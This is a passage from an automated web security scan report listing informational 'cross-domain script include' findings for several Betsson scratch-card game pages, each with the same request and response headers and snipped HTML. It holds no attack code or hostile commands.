https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Grand-Crown HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:17 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:17 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:17 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:17 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:17 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.105. https://scratch.betsson.com/en/Slots/Holiday-Hotel

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Holiday-Hotel

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Holiday-Hotel HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:23 GMT
Connection: close
Content-Length: 102685


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.106. https://scratch.betsson.com/en/Slots/Ice-Land

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Ice-Land

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Ice-Land HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:33 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:33 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:33 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:33 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:32 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.107. https://scratch.betsson.com/en/Slots/Legend-Of-Terra

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Legend-Of-Terra

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Legend-Of-Terra HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:25 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:25 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:25 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:25 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:25 GMT
Connection: close
Content-Length: 102678


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.108. https://scratch.betsson.com/en/Slots/Monaco-Glamour

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Monaco-Glamour

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Monaco-Glamour HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:25 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:25 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:25 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:25 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:25 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.109. https://scratch.betsson.com/en/Slots/Monte-Carlo

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Monte-Carlo

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Monte-Carlo HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:31 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:31 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:31 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:31 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:34 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.110. https://scratch.betsson.com/en/Slots/Pirates-Paradise

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Pirates-Paradise

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Pirates-Paradise HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:06 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.111. https://scratch.betsson.com/en/Slots/Sakura-Garden

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Sakura-Garden

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Sakura-Garden HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:06 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.112. https://scratch.betsson.com/en/Slots/Sea-And-Sun

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Sea-And-Sun

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Sea-And-Sun HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:23 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.113. https://scratch.betsson.com/en/Slots/Sky-Of-Love

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Sky-Of-Love

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Sky-Of-Love HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:30 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:30 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:30 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:30 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:30 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.114. https://scratch.betsson.com/en/Slots/Triple-Carnival

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Triple-Carnival

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Triple-Carnival HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:26 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:26 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:25 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.115. https://scratch.betsson.com/en/Slots/Tropical-Fruit

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Tropical-Fruit

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Tropical-Fruit HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:59 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:59 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:59 GMT
Connection: close
Content-Length: 102690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.116. https://scratch.betsson.com/en/Sports/100m-Champion

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/100m-Champion

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Sports/100m-Champion HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:53 GMT; path=/
